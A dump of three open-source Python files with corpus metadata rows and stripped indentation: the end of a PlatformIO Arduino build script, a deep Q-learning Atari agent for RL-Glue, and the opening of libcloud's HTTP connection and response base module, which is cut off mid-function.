elif env.get("PLATFORM") == "espressif":
env.Prepend(
CPPPATH=[join("$PLATFORMFW_DIR", "tools", "sdk", "include")],
LIBPATH=[join("$PLATFORMFW_DIR", "tools", "sdk", "lib")],
LIBS=["smartconfig", "pp", "main", "wpa", "lwip",
"net80211", "wps", "crypto", "phy", "hal", "axtls", "gcc", "m"]
)
env.Replace(PLATFORMFW_DIR=PLATFORMFW_DIR)
#
# Lookup for specific core's libraries
#
if isdir(join(env.subst("$PLATFORMFW_DIR"), "libraries", "__cores__", str(BOARD_CORELIBDIRNAME))): # [JORGE GARCIA] changed for non ascii chars
lib_dirs = env.get("LIBSOURCE_DIRS")
lib_dirs.insert(
lib_dirs.index(join("$PLATFORMFW_DIR", "libraries")),
join(PLATFORMFW_DIR, "libraries", "__cores__", BOARD_CORELIBDIRNAME)
)
env.Replace(
LIBSOURCE_DIRS=lib_dirs
)
#
# Base
#
ARDUINO_VERSION = int(
open(join(env.subst("$PLATFORMFW_DIR"),
"version.txt")).read().replace(".", "").strip())
# usb flags
ARDUINO_USBDEFINES = []
if "usb_product" in BOARD_BUILDOPTS:
ARDUINO_USBDEFINES = [
"USB_VID=${BOARD_OPTIONS['build']['vid']}",
"USB_PID=${BOARD_OPTIONS['build']['pid']}",
'USB_PRODUCT=\\"%s\\"' % (env.subst(
"${BOARD_OPTIONS['build']['usb_product']}").replace('"', ""))
]
if env.get("PLATFORM") == "teensy":
ARDUINO_USBDEFINES += [
"ARDUINO=10600",
"TEENSYDUINO=%d" % ARDUINO_VERSION
]
else:
ARDUINO_USBDEFINES += ["ARDUINO=%d" % ARDUINO_VERSION]
env.Append(
CPPDEFINES=ARDUINO_USBDEFINES,
CPPPATH=[
join("$BUILD_DIR", "FrameworkArduino")
]
)
#
# Atmel SAM platform
#
if env.subst("${PLATFORMFW_DIR}")[-3:] == "sam":
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkCMSISInc"),
join("$PLATFORMFW_DIR", "system", "CMSIS", "CMSIS", "Include")
)
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkDeviceInc"),
join("$PLATFORMFW_DIR", "system", "CMSIS", "Device", "ATMEL")
)
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkLibSam"),
join("$PLATFORMFW_DIR", "system", "libsam")
)
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkArduinoInc"),
join("$PLATFORMFW_DIR", "cores", "${BOARD_OPTIONS['build']['core']}")
)
env.Append(
CPPPATH=[
join("$BUILD_DIR", "FrameworkCMSISInc"),
join("$BUILD_DIR", "FrameworkLibSam"),
join("$BUILD_DIR", "FrameworkLibSam", "include"),
join("$BUILD_DIR", "FrameworkDeviceInc"),
join("$BUILD_DIR", "FrameworkDeviceInc", "sam3xa", "include")
]
)
# search relative includes in lib SAM directories
core_dir = join(env.subst("$PLATFORMFW_DIR"), "system", "libsam")
for root, _, files in walk(core_dir):
for lib_file in files:
file_path = join(root, lib_file)
if not isfile(file_path):
continue
content = None
content_changed = False
with open(file_path) as fp:
content = fp.read()
if '#include "../' in content:
content_changed = True
content = content.replace('#include "../', '#include "')
if not content_changed:
continue
with open(file_path, "w") as fp:
fp.write(content)
#
# Teensy platform
#
# Teensy 2.x Core
if BOARD_BUILDOPTS.get("core", None) == "teensy":
# search relative includes in teensy directories
core_dir = join(env.get("PIOHOME_DIR"), "packages",
"framework-arduinoteensy", "cores", "teensy")
for item in sorted(listdir(core_dir)):
file_path = join(core_dir, item)
if not isfile(file_path):
continue
content = None
content_changed = False
with open(file_path) as fp:
content = fp.read()
if '#include "../' in content:
content_changed = True
content = content.replace('#include "../', '#include "')
if not content_changed:
continue
with open(file_path, "w") as fp:
fp.write(content)
#
# Target: Build Core Library
#
libs = []
if "variant" in BOARD_BUILDOPTS:
env.Append(
CPPPATH=[
join("$BUILD_DIR", "FrameworkArduinoVariant")
]
)
libs.append(env.BuildLibrary(
join("$BUILD_DIR", "FrameworkArduinoVariant"),
join("$PLATFORMFW_DIR", "variants",
"${BOARD_OPTIONS['build']['variant']}")
))
envsafe = env.Clone()
libs.append(envsafe.BuildLibrary(
join("$BUILD_DIR", "FrameworkArduino"),
join("$PLATFORMFW_DIR", "cores", "${BOARD_OPTIONS['build']['core']}")
))
if env.subst("${PLATFORMFW_DIR}")[-3:] == "sam":
env.Append(
LIBPATH=[
join("$PLATFORMFW_DIR", "variants",
"${BOARD_OPTIONS['build']['variant']}")
]
)
envsafe.Append(
CFLAGS=[
"-std=gnu99"
]
)
libs.append("sam_sam3x8e_gcc_rel")
env.Append(LIBS=libs)
| gpl-3.0 | 4,259,678,504,592,114,700 | 29.065789 | 143 | 0.59008 | false |
aaannndddyyy/deep_q_rl | deep_q_rl/rl_glue_ale_agent.py | 3 | 16387 | """
This uses the skeleton_agent.py file from the Python-codec of rl-glue
as a starting point.
Author: Nathan Sprague
"""
#
# Copyright (C) 2008, Brian Tanner
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import os
import cPickle
from rlglue.agent.Agent import Agent
from rlglue.agent import AgentLoader as AgentLoader
from rlglue.types import Action
from rlglue.types import Observation
from rlglue.utils import TaskSpecVRLGLUE3
import time
import logging
import random
import numpy as np
import cv2
import argparse
import matplotlib.pyplot as plt
import ale_data_set
import theano
from q_network import DeepQLearner
import sys
sys.setrecursionlimit(10000)
floatX = theano.config.floatX
IMAGE_WIDTH = 160
IMAGE_HEIGHT = 210
CROPPED_WIDTH = 84
CROPPED_HEIGHT = 84
# Number of rows to crop off the bottom of the (downsampled) screen.
# This is appropriate for breakout, but it may need to be modified
# for other games.
CROP_OFFSET = 8
class NeuralAgent(Agent):
randGenerator=random.Random()
def __init__(self, discount, learning_rate, rms_decay, rms_epsilon,
momentum, epsilon_start, epsilon_min, epsilon_decay,
phi_length, replay_memory_size, exp_pref, nn_file,
pause, network_type, update_rule, batch_accumulator,
freeze_interval, batch_size, replay_start_size,
update_frequency, image_resize):
self.discount = discount
self.learning_rate = learning_rate
self.rms_decay = rms_decay
self.rms_epsilon = rms_epsilon
self.momentum = momentum
self.epsilon_start = epsilon_start
self.epsilon_min = epsilon_min
self.epsilon_decay = epsilon_decay
self.phi_length = phi_length
self.replay_memory_size = replay_memory_size
self.exp_pref = exp_pref
self.nn_file = nn_file
self.pause = pause
self.network_type = network_type
self.update_rule = update_rule
self.batch_accumulator = batch_accumulator
self.freeze_interval = freeze_interval
self.batch_size = batch_size
self.replay_start_size = replay_start_size
self.update_frequency = update_frequency
self.image_resize = image_resize
# CREATE A FOLDER TO HOLD RESULTS
time_str = time.strftime("_%m-%d-%H-%M_", time.gmtime())
self.exp_dir = self.exp_pref + time_str + \
"{}".format(self.learning_rate).replace(".", "p") + \
"_" + "{}".format(self.discount).replace(".", "p")
try:
os.stat(self.exp_dir)
except:
os.makedirs(self.exp_dir)
def agent_init(self, task_spec_string):
"""
This function is called once at the beginning of an experiment.
Arguments: task_spec_string - A string defining the task. This string
is decoded using
TaskSpecVRLGLUE3.TaskSpecParser
"""
# DO SOME SANITY CHECKING ON THE TASKSPEC
TaskSpec = TaskSpecVRLGLUE3.TaskSpecParser(task_spec_string)
if TaskSpec.valid:
assert ((len(TaskSpec.getIntObservations()) == 0) !=
(len(TaskSpec.getDoubleObservations()) == 0)), \
"expecting continous or discrete observations. Not both."
assert len(TaskSpec.getDoubleActions()) == 0, \
"expecting no continuous actions"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][0]), \
" expecting min action to be a number not a special value"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][1]), \
" expecting max action to be a number not a special value"
self.num_actions = TaskSpec.getIntActions()[0][1]+1
else:
logging.error("INVALID TASK SPEC")
self.data_set = ale_data_set.DataSet(width=CROPPED_WIDTH,
height=CROPPED_HEIGHT,
max_steps=self.replay_memory_size,
phi_length=self.phi_length)
# just needs to be big enough to create phi's
self.test_data_set = ale_data_set.DataSet(width=CROPPED_WIDTH,
height=CROPPED_HEIGHT,
max_steps=10,
phi_length=self.phi_length)
self.epsilon = self.epsilon_start
if self.epsilon_decay != 0:
self.epsilon_rate = ((self.epsilon_start - self.epsilon_min) /
self.epsilon_decay)
else:
self.epsilon_rate = 0
#self.target_reset_freq = 10000 # target network update frequency
self.testing = False
if self.nn_file is None:
self.network = self._init_network()
else:
handle = open(self.nn_file, 'r')
self.network = cPickle.load(handle)
self._open_results_file()
self._open_learning_file()
self.episode_counter = 0
self.batch_counter = 0
self.holdout_data = None
# In order to add an element to the data set we need the
# previous state and action and the current reward. These
# will be used to store states and actions.
self.last_img = None
self.last_action = None
def _init_network(self):
"""
A subclass may override this if a different sort
of network is desired.
"""
return DeepQLearner(CROPPED_WIDTH,
CROPPED_HEIGHT,
self.num_actions,
self.phi_length,
self.discount,
self.learning_rate,
self.rms_decay,
self.rms_epsilon,
self.momentum,
self.freeze_interval,
self.batch_size,
self.network_type,
self.update_rule,
self.batch_accumulator)
def _open_results_file(self):
logging.info("OPENING " + self.exp_dir + '/results.csv')
self.results_file = open(self.exp_dir + '/results.csv', 'w', 0)
self.results_file.write(\
'epoch,num_episodes,total_reward,reward_per_epoch,mean_q\n')
self.results_file.flush()
def _open_learning_file(self):
self.learning_file = open(self.exp_dir + '/learning.csv', 'w', 0)
self.learning_file.write('mean_loss,epsilon\n')
self.learning_file.flush()
def _update_results_file(self, epoch, num_episodes, holdout_sum):
out = "{},{},{},{},{}\n".format(epoch, num_episodes, self.total_reward,
self.total_reward / float(num_episodes),
holdout_sum)
self.results_file.write(out)
self.results_file.flush()
def _update_learning_file(self):
out = "{},{}\n".format(np.mean(self.loss_averages),
self.epsilon)
self.learning_file.write(out)
self.learning_file.flush()
def agent_start(self, observation):
"""
This method is called once at the beginning of each episode.
No reward is provided, because reward is only available after
an action has been taken.
Arguments:
observation - An observation of type rlglue.types.Observation
Returns:
An action of type rlglue.types.Action
"""
self.step_counter = 0
self.batch_counter = 0
# We report the mean loss for every epoch.
self.loss_averages = []
self.start_time = time.time()
this_int_action = self.randGenerator.randint(0, self.num_actions-1)
return_action = Action()
return_action.intArray = [this_int_action]
self.last_action = copy.deepcopy(return_action)
self.last_img = self._resize_observation(observation.intArray)
return return_action
def _show_phis(self, phi1, phi2):
for p in range(self.phi_length):
plt.subplot(2, self.phi_length, p+1)
plt.imshow(phi1[p, :, :], interpolation='none', cmap="gray")
plt.grid(color='r', linestyle='-', linewidth=1)
for p in range(self.phi_length):
plt.subplot(2, self.phi_length, p+5)
plt.imshow(phi2[p, :, :], interpolation='none', cmap="gray")
plt.grid(color='r', linestyle='-', linewidth=1)
plt.show()
def _resize_observation(self, observation):
# reshape linear to original image size, skipping the RAM portion
image = observation[128:].reshape(IMAGE_HEIGHT, IMAGE_WIDTH, 3)
# convert from int32s
image = np.array(image, dtype="uint8")
# convert to greyscale
greyscaled = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
if self.image_resize == 'crop':
# resize keeping aspect ratio
resize_width = CROPPED_WIDTH
resize_height = int(round(float(IMAGE_HEIGHT) * CROPPED_HEIGHT /
IMAGE_WIDTH))
resized = cv2.resize(greyscaled, (resize_width, resize_height),
interpolation=cv2.INTER_LINEAR)
# Crop the part we want
crop_y_cutoff = resize_height - CROP_OFFSET - CROPPED_HEIGHT
cropped = resized[crop_y_cutoff:crop_y_cutoff + CROPPED_HEIGHT, :]
return cropped
elif self.image_resize == 'scale':
return cv2.resize(greyscaled, (CROPPED_WIDTH, CROPPED_HEIGHT),
interpolation=cv2.INTER_LINEAR)
else:
raise ValueError('Unrecognized image resize method.')
def agent_step(self, reward, observation):
"""
This method is called each time step.
Arguments:
reward - Real valued reward.
observation - An observation of type rlglue.types.Observation
Returns:
An action of type rlglue.types.Action
"""
self.step_counter += 1
return_action = Action()
cur_img = self._resize_observation(observation.intArray)
#TESTING---------------------------
if self.testing:
self.total_reward += reward
int_action = self._choose_action(self.test_data_set, .05,
cur_img, np.clip(reward, -1, 1))
if self.pause > 0:
time.sleep(self.pause)
#NOT TESTING---------------------------
else:
if len(self.data_set) > self.replay_start_size:
self.epsilon = max(self.epsilon_min,
self.epsilon - self.epsilon_rate)
int_action = self._choose_action(self.data_set, self.epsilon,
cur_img,
np.clip(reward, -1, 1))
if self.step_counter % self.update_frequency == 0:
loss = self._do_training()
self.batch_counter += 1
self.loss_averages.append(loss)
else: # Still gathering initial random data...
int_action = self._choose_action(self.data_set, self.epsilon,
cur_img,
np.clip(reward, -1, 1))
return_action.intArray = [int_action]
self.last_action = copy.deepcopy(return_action)
self.last_img = cur_img
return return_action
def _choose_action(self, data_set, epsilon, cur_img, reward):
"""
Add the most recent data to the data set and choose
an action based on the current policy.
"""
data_set.add_sample(self.last_img,
self.last_action.intArray[0],
reward, False)
if self.step_counter >= self.phi_length:
phi = data_set.phi(cur_img)
int_action = self.network.choose_action(phi, epsilon)
else:
int_action = self.randGenerator.randint(0, self.num_actions - 1)
return int_action
def _do_training(self):
"""
Returns the average loss for the current batch.
May be overridden if a subclass needs to train the network
differently.
"""
states, actions, rewards, next_states, terminals = \
self.data_set.random_batch(self.batch_size)
return self.network.train(states, actions, rewards,
next_states, terminals)
def agent_end(self, reward):
"""
This function is called once at the end of an episode.
Arguments:
reward - Real valued reward.
Returns:
None
"""
self.episode_counter += 1
self.step_counter += 1
total_time = time.time() - self.start_time
if self.testing:
self.total_reward += reward
else:
# Store the latest sample.
self.data_set.add_sample(self.last_img,
self.last_action.intArray[0],
np.clip(reward, -1, 1),
True)
logging.info("steps/second: {:.2f}".format(\
self.step_counter/total_time))
if self.batch_counter > 0:
self._update_learning_file()
logging.info("average loss: {:.4f}".format(\
np.mean(self.loss_averages)))
def agent_cleanup(self):
"""
Called once at the end of an experiment. We could save results
here, but we use the agent_message mechanism instead so that
a file name can be provided by the experiment.
"""
pass
def agent_message(self, in_message):
"""
The experiment will cause this method to be called. Used
to save data to the indicated file.
"""
#WE NEED TO DO THIS BECAUSE agent_end is not called
# we run out of steps.
if in_message.startswith("episode_end"):
self.agent_end(0)
elif in_message.startswith("finish_epoch"):
epoch = int(in_message.split(" ")[1])
net_file = open(self.exp_dir + '/network_file_' + str(epoch) + \
'.pkl', 'w')
cPickle.dump(self.network, net_file, -1)
net_file.close()
elif in_message.startswith("start_testing"):
self.testing = True
self.total_reward = 0
self.episode_counter = 0
elif in_message.startswith("finish_testing"):
self.testing = False
holdout_size = 3200
epoch = int(in_message.split(" ")[1])
if self.holdout_data is None:
self.holdout_data = self.data_set.random_batch(holdout_size)[0]
holdout_sum = 0
for i in range(holdout_size):
holdout_sum += np.mean(
self.network.q_vals(self.holdout_data[i, ...]))
self._update_results_file(epoch, self.episode_counter,
holdout_sum / holdout_size)
else:
return "I don't know how to respond to your message"
def main():
AgentLoader.loadAgent(NeuralAgent())
if __name__ == "__main__":
main()
| bsd-3-clause | -229,187,849,025,680,800 | 33.940299 | 79 | 0.549399 | false |
IsCoolEntertainment/debpkg_libcloud | libcloud/common/base.py | 1 | 27569 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import ssl
import time
from xml.etree import ElementTree as ET
from pipes import quote as pquote
try:
import simplejson as json
except:
import json
import libcloud
from libcloud.utils.py3 import PY3, PY25
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import urlparse
from libcloud.utils.py3 import urlencode
from libcloud.utils.py3 import StringIO
from libcloud.utils.py3 import u
from libcloud.utils.py3 import b
from libcloud.utils.misc import lowercase_keys
from libcloud.utils.compression import decompress_data
from libcloud.common.types import LibcloudError, MalformedResponseError
from libcloud.httplib_ssl import LibcloudHTTPSConnection
LibcloudHTTPConnection = httplib.HTTPConnection
# Stores information about all of the issued HTTP request.
# Request logger is only active is LIBCLOUD_DEBUG and LIBCLOUD_REQUESTS_STATS
# environment variable is set and should NOT be used in production.
REQUESTS_LOG = []
class HTTPResponse(httplib.HTTPResponse):
# On python 2.6 some calls can hang because HEAD isn't quite properly
# supported.
# In particular this happens on S3 when calls are made to get_object to
# objects that don't exist.
# This applies the behaviour from 2.7, fixing the hangs.
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
return httplib.HTTPResponse.read(self, amt)
class Response(object):
"""
A Base Response class to derive from.
"""
NODE_STATE_MAP = {}
object = None
body = None
status = httplib.OK
headers = {}
error = None
connection = None
parse_zero_length_body = False
def __init__(self, response, connection):
self.body = self._decompress_response(response=response)
if PY3:
self.body = b(self.body).decode('utf-8')
self.status = response.status
# http.client In Python 3 doesn't automatically lowercase the header
# names
self.headers = lowercase_keys(dict(response.getheaders()))
self.error = response.reason
self.connection = connection
if not self.success():
raise Exception(self.parse_error())
self.object = self.parse_body()
def parse_body(self):
"""
Parse response body.
Override in a provider's subclass.
@return: Parsed body.
"""
return self.body
def parse_error(self):
"""
Parse the error messages.
Override in a provider's subclass.
@return: Parsed error.
"""
return self.body
def success(self):
"""
Determine if our request was successful.
The meaning of this can be arbitrary; did we receive OK status? Did
the node get created? Were we authenticated?
@return: C{True} or C{False}
"""
return self.status == httplib.OK or self.status == httplib.CREATED
def _decompress_response(self, response):
"""
Decompress a response body if it is using deflate or gzip encoding.
@return: Decompressed response
"""
headers = lowercase_keys(dict(response.getheaders()))
encoding = headers.get('content-encoding', None)
original_data = getattr(response, '_original_data', None)
if original_data is not None:
return original_data
body = response.read()
if encoding in ['zlib', 'deflate']:
body = decompress_data('zlib', body)
elif encoding in ['gzip', 'x-gzip']:
body = decompress_data('gzip', body)
else:
body = body.strip()
return body
class JsonResponse(Response):
"""
A Base JSON Response class to derive from.
"""
def parse_body(self):
if len(self.body) == 0 and not self.parse_zero_length_body:
return self.body
try:
body = json.loads(self.body)
except:
raise MalformedResponseError(
"Failed to parse JSON",
body=self.body,
driver=self.connection.driver)
return body
parse_error = parse_body
class XmlResponse(Response):
"""
A Base XML Response class to derive from.
"""
def parse_body(self):
if len(self.body) == 0 and not self.parse_zero_length_body:
return self.body
try:
body = ET.XML(self.body)
except:
raise MalformedResponseError("Failed to parse XML",
body=self.body,
driver=self.connection.driver)
return body
parse_error = parse_body
class RawResponse(Response):
def __init__(self, connection):
self._status = None
self._response = None
self._headers = {}
self._error = None
self._reason = None
self.connection = connection
@property
def response(self):
if not self._response:
response = self.connection.connection.getresponse()
self._response, self.body = response, response
if not self.success():
self.parse_error()
return self._response
@property
def status(self):
if not self._status:
self._status = self.response.status
return self._status
@property
def headers(self):
if not self._headers:
self._headers = lowercase_keys(dict(self.response.getheaders()))
return self._headers
@property
def reason(self):
if not self._reason:
self._reason = self.response.reason
return self._reason
#TODO: Move this to a better location/package
class LoggingConnection():
"""
Debug class to log all HTTP(s) requests as they could be made
with the C{curl} command.
@cvar log: file-like object that logs entries are written to.
"""
log = None
enable_requests_stats = False
def _log_response(self, r):
rv = "# -------- begin %d:%d response ----------\n" % (id(self), id(r))
ht = ""
v = r.version
if r.version == 10:
v = "HTTP/1.0"
if r.version == 11:
v = "HTTP/1.1"
ht += "%s %s %s\r\n" % (v, r.status, r.reason)
body = r.read()
for h in r.getheaders():
ht += "%s: %s\r\n" % (h[0].title(), h[1])
ht += "\r\n"
# this is evil. laugh with me. ha arharhrhahahaha
class fakesock:
def __init__(self, s):
self.s = s
def makefile(self, *args, **kwargs):
if PY3:
from io import BytesIO
cls = BytesIO
else:
cls = StringIO
return cls(b(self.s))
rr = r
original_data = body
headers = lowercase_keys(dict(r.getheaders()))
encoding = headers.get('content-encoding', None)
if encoding in ['zlib', 'deflate']:
body = decompress_data('zlib', body)
elif encoding in ['gzip', 'x-gzip']:
body = decompress_data('gzip', body)
if r.chunked:
ht += "%x\r\n" % (len(body))
ht += u(body)
ht += "\r\n0\r\n"
else:
ht += u(body)
if sys.version_info >= (2, 6) and sys.version_info < (2, 7):
cls = HTTPResponse
else:
cls = httplib.HTTPResponse
rr = cls(sock=fakesock(ht), method=r._method,
debuglevel=r.debuglevel)
rr.begin()
rv += ht
rv += ("\n# -------- end %d:%d response ----------\n"
% (id(self), id(r)))
rr._original_data = body
return (rr, rv)
def _log_curl(self, method, url, body, headers):
cmd = ["curl", "-i"]
cmd.extend(["-X", pquote(method)])
for h in headers:
cmd.extend(["-H", pquote("%s: %s" % (h, headers[h]))])
# TODO: in python 2.6, body can be a file-like object.
if body is not None and len(body) > 0:
cmd.extend(["--data-binary", pquote(body)])
url = pquote(self._get_url(path=url))
cmd.extend(["--compress"])
cmd.extend([url])
return " ".join(cmd)
def _get_url(self, path):
url = '%s://%s:%d%s' % (self.protocol, self.host,
self.port, path)
return url
class LoggingHTTPSConnection(LoggingConnection, LibcloudHTTPSConnection):
"""
Utility Class for logging HTTPS connections
"""
protocol = 'https'
def getresponse(self):
r = LibcloudHTTPSConnection.getresponse(self)
if self.log is not None:
r, rv = self._log_response(r)
self.log.write(rv + "\n")
self.log.flush()
return r
def request(self, method, url, body=None, headers=None):
headers.update({'X-LC-Request-ID': str(id(self))})
if self.log is not None:
pre = "# -------- begin %d request ----------\n" % id(self)
self.log.write(pre +
self._log_curl(method, url, body, headers) + "\n")
self.log.flush()
if self.enable_requests_stats:
full_url = self._get_url(path=url)
obj = {'method': method, 'url': full_url}
REQUESTS_LOG.append(obj)
return LibcloudHTTPSConnection.request(self, method, url, body,
headers)
class LoggingHTTPConnection(LoggingConnection, LibcloudHTTPConnection):
"""
Utility Class for logging HTTP connections
"""
protocol = 'http'
def getresponse(self):
r = LibcloudHTTPConnection.getresponse(self)
if self.log is not None:
r, rv = self._log_response(r)
self.log.write(rv + "\n")
self.log.flush()
return r
def request(self, method, url, body=None, headers=None):
headers.update({'X-LC-Request-ID': str(id(self))})
if self.log is not None:
pre = "# -------- begin %d request ----------\n" % id(self)
self.log.write(pre +
self._log_curl(method, url, body, headers) + "\n")
self.log.flush()
return LibcloudHTTPConnection.request(self, method, url,
body, headers)
class Connection(object):
"""
A Base Connection class to derive from.
"""
#conn_classes = (LoggingHTTPSConnection)
conn_classes = (LibcloudHTTPConnection, LibcloudHTTPSConnection)
responseCls = Response
rawResponseCls = RawResponse
connection = None
host = '127.0.0.1'
port = 443
timeout = None
secure = 1
driver = None
action = None
def __init__(self, secure=True, host=None, port=None, url=None,
timeout=None):
self.secure = secure and 1 or 0
self.ua = []
self.context = {}
self.request_path = ''
if host:
self.host = host
if port != None:
self.port = port
else:
if self.secure == 1:
self.port = 443
else:
self.port = 80
if url:
(self.host, self.port, self.secure,
self.request_path) = self._tuple_from_url(url)
if timeout:
self.timeout = timeout
def set_context(self, context):
self.context = context
def _tuple_from_url(self, url):
secure = 1
port = None
(scheme, netloc, request_path, param,
query, fragment) = urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise LibcloudError('Invalid scheme: %s in url %s' % (scheme, url))
if scheme == "http":
secure = 0
if ":" in netloc:
netloc, port = netloc.rsplit(":")
port = port
if not port:
if scheme == "http":
port = 80
else:
port = 443
host = netloc
return (host, port, secure, request_path)
def connect(self, host=None, port=None, base_url=None):
"""
Establish a connection with the API server.
@type host: C{str}
@param host: Optional host to override our default
@type port: C{int}
@param port: Optional port to override our default
@returns: A connection
"""
# prefer the attribute base_url if its set or sent
connection = None
secure = self.secure
if getattr(self, 'base_url', None) and base_url == None:
(host, port,
secure, request_path) = self._tuple_from_url(self.base_url)
elif base_url != None:
(host, port,
secure, request_path) = self._tuple_from_url(base_url)
else:
host = host or self.host
port = port or self.port
kwargs = {'host': host, 'port': int(port)}
# Timeout is only supported in Python 2.6 and later
# http://docs.python.org/library/httplib.html#httplib.HTTPConnection
if self.timeout and not PY25:
kwargs.update({'timeout': self.timeout})
connection = self.conn_classes[secure](**kwargs)
# You can uncoment this line, if you setup a reverse proxy server
# which proxies to your endpoint, and lets you easily capture
# connections in cleartext when you setup the proxy to do SSL
# for you
#connection = self.conn_classes[False]("127.0.0.1", 8080)
self.connection = connection
def _user_agent(self):
user_agent_suffix = ' '.join(['(%s)' % x for x in self.ua])
if self.driver:
user_agent = 'libcloud/%s (%s) %s' % (
libcloud.__version__,
self.driver.name, user_agent_suffix)
else:
user_agent = 'libcloud/%s %s' % (
libcloud.__version__, user_agent_suffix)
return user_agent
def user_agent_append(self, token):
"""
Append a token to a user agent string.
Users of the library should call this to uniquely identify thier
requests to a provider.
@type token: C{str}
@param token: Token to add to the user agent.
"""
self.ua.append(token)
def request(self, action, params=None, data=None, headers=None,
method='GET', raw=False):
"""
Request a given `action`.
Basically a wrapper around the connection
object's `request` that does some helpful pre-processing.
@type action: C{str}
@param action: A path. This can include arguments. If included,
any extra parameters are appended to the existing ones.
@type params: C{dict}
@param params: Optional mapping of additional parameters to send. If
None, leave as an empty C{dict}.
@type data: C{unicode}
@param data: A body of data to send with the request.
@type headers: C{dict}
@param headers: Extra headers to add to the request
None, leave as an empty C{dict}.
@type method: C{str}
@param method: An HTTP method such as "GET" or "POST".
@type raw: C{bool}
@param raw: True to perform a "raw" request aka only send the headers
and use the rawResponseCls class. This is used with
storage API when uploading a file.
@return: An instance of type I{responseCls}
"""
if params is None:
params = {}
if headers is None:
headers = {}
action = self.morph_action_hook(action)
self.action = action
self.method = method
# Extend default parameters
params = self.add_default_params(params)
# Extend default headers
headers = self.add_default_headers(headers)
# We always send a user-agent header
headers.update({'User-Agent': self._user_agent()})
# Indicate that we support gzip and deflate compression
headers.update({'Accept-Encoding': 'gzip,deflate'})
port = int(self.port)
if port not in (80, 443):
headers.update({'Host': "%s:%d" % (self.host, port)})
else:
headers.update({'Host': self.host})
if data:
data = self.encode_data(data)
headers['Content-Length'] = str(len(data))
elif method.upper() in ['POST', 'PUT'] and not raw:
# Only send Content-Length 0 with POST and PUT request.
#
# Note: Content-Length is not added when using "raw" mode means
# means that headers are upfront and the body is sent at some point
# later on. With raw mode user can specify Content-Length with
# "data" not being set.
headers['Content-Length'] = '0'
params, headers = self.pre_connect_hook(params, headers)
if params:
if '?' in action:
url = '&'.join((action, urlencode(params, doseq=True)))
else:
url = '?'.join((action, urlencode(params, doseq=True)))
else:
url = action
# Removed terrible hack...this a less-bad hack that doesn't execute a
# request twice, but it's still a hack.
self.connect()
try:
# @TODO: Should we just pass File object as body to request method
# instead of dealing with splitting and sending the file ourselves?
if raw:
self.connection.putrequest(method, url)
for key, value in list(headers.items()):
self.connection.putheader(key, str(value))
self.connection.endheaders()
else:
self.connection.request(method=method, url=url, body=data,
headers=headers)
except ssl.SSLError:
e = sys.exc_info()[1]
raise ssl.SSLError(str(e))
if raw:
response = self.rawResponseCls(connection=self)
else:
response = self.responseCls(response=self.connection.getresponse(),
connection=self)
return response
def morph_action_hook(self, action):
return self.request_path + action
def add_default_params(self, params):
"""
Adds default parameters (such as API key, version, etc.)
to the passed `params`
Should return a dictionary.
"""
return params
def add_default_headers(self, headers):
"""
Adds default headers (such as Authorization, X-Foo-Bar)
to the passed `headers`
Should return a dictionary.
"""
return headers
def pre_connect_hook(self, params, headers):
"""
A hook which is called before connecting to the remote server.
This hook can perform a final manipulation on the params, headers and
url parameters.
@type params: C{dict}
@param params: Request parameters.
@type headers: C{dict}
@param headers: Request headers.
"""
return params, headers
def encode_data(self, data):
"""
Encode body data.
Override in a provider's subclass.
"""
return data
class PollingConnection(Connection):
"""
Connection class which can also work with the async APIs.
After initial requests, this class periodically polls for jobs status and
waits until the job has finished.
If job doesn't finish in timeout seconds, an Exception thrown.
"""
poll_interval = 0.5
timeout = 200
request_method = 'request'
def async_request(self, action, params=None, data=None, headers=None,
method='GET', context=None):
"""
Perform an 'async' request to the specified path. Keep in mind that
this function is *blocking* and 'async' in this case means that the
hit URL only returns a job ID which is the periodically polled until
the job has completed.
This function works like this:
- Perform a request to the specified path. Response should contain a
'job_id'.
- Returned 'job_id' is then used to construct a URL which is used for
retrieving job status. Constructed URL is then periodically polled
until the response indicates that the job has completed or the
timeout of 'self.timeout' seconds has been reached.
@type action: C{str}
@param action: A path
@type params: C{dict}
@param params: Optional mapping of additional parameters to send. If
None, leave as an empty C{dict}.
@type data: C{unicode}
@param data: A body of data to send with the request.
@type headers: C{dict}
@param headers: Extra headers to add to the request
None, leave as an empty C{dict}.
@type method: C{str}
@param method: An HTTP method such as "GET" or "POST".
@type context: C{dict}
@param context: Context dictionary which is passed to the functions
which construct initial and poll URL.
@return: An instance of type I{responseCls}
"""
request = getattr(self, self.request_method)
kwargs = self.get_request_kwargs(action=action, params=params,
data=data, headers=headers,
method=method,
context=context)
response = request(**kwargs)
kwargs = self.get_poll_request_kwargs(response=response,
context=context,
request_kwargs=kwargs)
end = time.time() + self.timeout
completed = False
while time.time() < end and not completed:
response = request(**kwargs)
completed = self.has_completed(response=response)
if not completed:
time.sleep(self.poll_interval)
if not completed:
raise LibcloudError('Job did not complete in %s seconds' %
(self.timeout))
return response
def get_request_kwargs(self, action, params=None, data=None, headers=None,
method='GET', context=None):
"""
Arguments which are passed to the initial request() call inside
async_request.
"""
